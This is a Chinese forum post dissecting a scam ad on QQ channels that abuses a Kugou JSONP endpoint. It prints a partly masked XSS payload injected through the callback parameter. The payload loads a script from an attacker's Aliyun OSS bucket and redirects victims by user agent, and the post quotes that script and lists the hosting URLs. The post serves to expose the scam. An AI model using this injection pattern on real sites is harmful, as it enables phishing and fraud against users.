作者共發了17篇帖子。
最近几个qq频道都看到这样的广告(虚假)
 |
Rt
|
|
 |
|
 |
|
 |
|
可以看到是通过callback的时候注入js来实现的
|
|
链接样本:https://fx1.service.kugou.com/fx/timemachine/web/video/music/view/current.json;BptVdOEe?_p=0&jsonpcallback=*********%E5%BF%83&starId=1869700074&needHttps=1xxx%3Cbody%2Fhidd********g%2Fonload%3DsetT********7Bwith(document)body.appendChild(createElement(%60script%60)).src%3D%60%2F%2***20*5rkkk.oss-cn-hangzhou.aliyuncs.com%2Ff83945%60%7D%2C0)%3E&roomId=5836125&playuuid=418337196428721473&vertical=1&leygw0Th=CHvRDYio&rr=1737302142772****
|
|
原理分析:1. 通过酷狗官方接口,本是用来打开一个json文件,但是在callback里注入了js xss攻击代码,跳转到新的*骗网站链接
star:获取一个js执行,把当前窗口href改为真正的*站链接
star:而且会判断是否ua是电脑的,如果是电脑直接跳转到qq下载界面
star:回复 @啊啊是谁都对:还有呢
[查看詳情]
|
|
function isMobileQQ() { var ua = navigator.userAgent.toLowerCase(); var isMobile = /iphone|ipod|ipad|android|harmonyos/i.test(ua); var isQQBrowser = /qq/i.test(ua); var isIOSQQ = /iphone|ipod|ipad/i.test(ua) && /qq/i.test(ua); var isAndroidQQ = /android/i.test(ua) && /qq/i.test(ua); var isHarmonyOSQQ = /harmonyos/i.test(ua) && /qq/i.test(ua); return isMobile && isQQBrowser && (isIOSQQ || isAndroidQQ || isHarmonyOSQQ); } if (isMobileQQ()) { } else { top.location.href="https://im.qq.com/index/#downloadAnchor"; } mqq.ui.setWebViewBehavior({ swipeBack:0 }) |
|
最终图片资源指向 https://2025rkkk.oss-cn-hangzhou.****yuncs.com/ 为aliyun OSS存储地址
|
|
https://2025rkkk.oss-cn-hangzhou.aliyuncs.com/index.html?1755358585303 (最终html文件下载链接地址)(已留样)
|
